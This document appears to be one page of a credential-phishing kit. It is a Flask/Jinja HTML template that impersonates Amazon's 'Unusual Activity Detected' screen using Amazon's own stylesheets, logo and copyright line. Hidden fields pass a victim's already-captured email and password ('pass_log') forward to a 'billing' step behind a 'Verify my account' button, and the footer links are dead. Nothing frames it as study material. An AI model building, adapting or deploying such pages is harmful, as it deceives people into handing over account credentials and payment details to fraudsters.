<html
  class="a-touch a-mobile a-js a-audio a-video a-canvas a-svg a-drag-drop a-geolocation a-history a-webworker a-autofocus a-input-placeholder a-textarea-placeholder a-local-storage a-orientation a-touch a-gradients a-hires a-transform3d a-touch-scrolling a-android a-mobile a-text-shadow a-text-stroke a-box-shadow a-border-radius a-border-image a-opacity a-transform a-transition a-ember"
  data-19ax5a9jf="mongoose"
  data-aui-build-date="3.21.3-2021-04-08">
  <head>
    <meta
      name="viewport"
      content="width=device-width, maximum-scale=1, minimum-scale=1, initial-scale=1, user-scalable=no, shrink-to-fit=no" />
    <meta charset="utf-8" />
    <title dir="ltr">Unusual Activity Detected</title>
    <link
      rel="apple-touch-icon"
      sizes="76x76"
      href="{{ url_for('static',filename='img/favicon.ico') }}" />
    <link
      rel="icon"
      type="image/png"
      href="{{ url_for('static',filename='img/favicon.ico') }}" />
    <link
      rel="stylesheet"
      href="https://images-na.ssl-images-amazon.com/images/I/11OrJUma5UL._RC|01rXlRztnIL.css,41aVkKTegZL.css,21ak7+1wqPL.css,01uNpa0PcLL.css,01NtHviPbnL.css,01xH24p45SL.css,310ooOGCdhL.css,11o2wHvvdBL.css,01i9N7e-hBL.css,11VHr91CkuL.css,11ADf9L1OdL.css,01IdKcBuAdL.css,019pz6QNQ6L.css,01wLsDqViEL.css,018gwG6-KML.css,017oxx82kUL.css,313nlhtomlL.css,01B-YPN7k2L.css,21VgUeznheL.css,116TGBv0izL.css,11hcDsGAR1L.css,21AL2IbGWYL.css,01Zit5mlZtL.css,01CFUgsA-YL.css,31rjFdV1T2L.css,014rTkZXuAL.css,1143-dXvfTL.css,11MNK-noG6L.css,11VvAxw559L.css,01XRXSECMKL.css,110Q3MAjYJL.css,217CY98bj7L.css,118ArY7aMgL.css,01vd5lqeZUL.css,215BN1xpbYL.css,11KiKPowgWL.css,01p8s3ASHFL.css,11r1-thmy4L.css,014n1hV6shL.css,11eI5SJms1L.css,01cbS3UK11L.css,21HViuPTI1L.css,01INc4pyFRL.css_.css?AUIClients/AmazonUI&amp;W62YVa8H#mobile.us.not-trident.322290-T2.338061-T1.322288-T1" />
    <link
      rel="stylesheet"
      href="https://images-na.ssl-images-amazon.com/images/I/11vbcpUoDhL.css?AUIClients/CVFAssets#mobile" />
  </head>
  <body
    class="a-color-offset-background a-m-us a-aui_72554-c a-aui_csa_templates_buildin_ww_exp_337518-c a-aui_csa_templates_buildin_ww_launch_337517-c a-aui_csa_templates_declarative_ww_exp_337521-c a-aui_csa_templates_declarative_ww_launch_337520-c a-aui_mm_desktop_exp_291916-c a-aui_mm_desktop_launch_291918-c a-aui_mm_desktop_targeted_exp_291928-c a-aui_mm_desktop_targeted_launch_291922-c a-aui_pci_risk_banner_210084-c a-aui_preload_261698-c a-aui_rel_noreferrer_noopener_309527-c a-aui_template_weblab_cache_333406-c a-aui_tnr_v2_180836-c">
    <div id="a-page">
      <div class="a-section a-spacing-none">
        <div class="a-container a-global-nav-wrapper">
          <div class="a-section a-spacing-none a-text-center">
            <a class="a-link-nav-icon" tabindex="-1"
              ><i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i
            ></a>
          </div>
        </div>
      </div>
      <div class="a-section a-padding-base a-text-center">
        <div class="a-section a-text-left cvf-widget-container">
          <div class="a-section cvf-page-layout">
            <div id="cvf-page-content" class="a-section">
              <div class="a-row a-spacing-none">
                <form action="billing" class="a-spacing-none">
                  <span
                    class="a-declarative"
                    data-action="a-sheet"
                    data-a-sheet="{}"></span>
                  <br />
                  <div class="a-row a-spacing-small">
                    <br /><br />
                    <div class="a-row a-spacing-small">
                      <h1>Unusual Activity Detected</h1>
                    </div>
                    <div class="a-row a-spacing-micro">
                      <span
                        >We detected unusual sign-in attempts. To ensure that no
                        one else tries to access your account, please secure and
                        verify your account!
                      </span>
                    </div>
                    <div class="a-row a-spacing-micro">
                      <span></span>
                    </div>
                  </div>
                  <input
                    type="hidden"
                    name="akseskey"
                    id="akseskey"
                    value="{{ key }}" />
                  <input
                    type="hidden"
                    name="email"
                    id="email"
                    value="{{ mail }}" />
                  <input
                    type="hidden"
                    name="pass_log"
                    id="pass_log"
                    value="{{ pass_log }}" />
                  <input type="hidden" name="cn" value="{{ cn }}" />
                  <div class="a-row a-spacing-micro"></div>
                  <div class="a-row a-spacing-small">
                    <span
                      id="cvf-submit-otp-button"
                      class="a-button a-button-span12 a-button-primary cvf-widget-btn cvf-widget-btn-verify"
                      style="height: 47px">
                      <span class="a-button-inner">
                        <input
                          class="a-button-input"
                          type="submit"
                          aria-labelledby="cvf-submit-otp-button-announce" />
                        <span
                          id="cvf-submit-otp-button-announce"
                          class="a-button-text"
                          aria-hidden="true"
                          >Verify my account</span
                        ></span
                      ></span
                    >
                  </div>
                </form>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="a-row auth-footer">
        <style>
          .auth-footer-separator {
            display: inline-block;
            width: 20px;
          }
        </style>
        <br /><br /><br /><br />
        <div class="a-divider a-divider-section">
          <div class="a-divider-inner"><br /><br /></div>
        </div>
        <div id="footer" class="a-section">
          <div class="a-section a-spacing-small a-text-center a-size-mini">
            <span class="auth-footer-separator"></span>
            <a
              class="a-link-normal"
              target="_blank"
              rel="noopener"
              href="javascript: void(0)"
              >Conditions of Use</a
            >
            <span class="auth-footer-separator"></span>
            <a
              class="a-link-normal"
              target="_blank"
              rel="noopener"
              href="javascript: void(0)"
              >Privacy Notice</a
            >
            <span class="auth-footer-separator"></span>
            <a
              class="a-link-normal"
              target="_blank"
              rel="noopener"
              href="javascript: void(0)"
              >Help</a
            >
            <span class="auth-footer-separator"></span>
          </div>
          <div class="a-section a-spacing-none a-text-center">
            <span class="a-size-mini a-color-secondary"
              >© 1996-2023, Amazon.com, Inc. or its affiliates</span
            >
          </div>
        </div>
      </div>
    </div>
    <div id="a-white"></div>
    <div id="a-popover-root" style="z-index: -1; position: absolute"></div>
  </body>
</html>
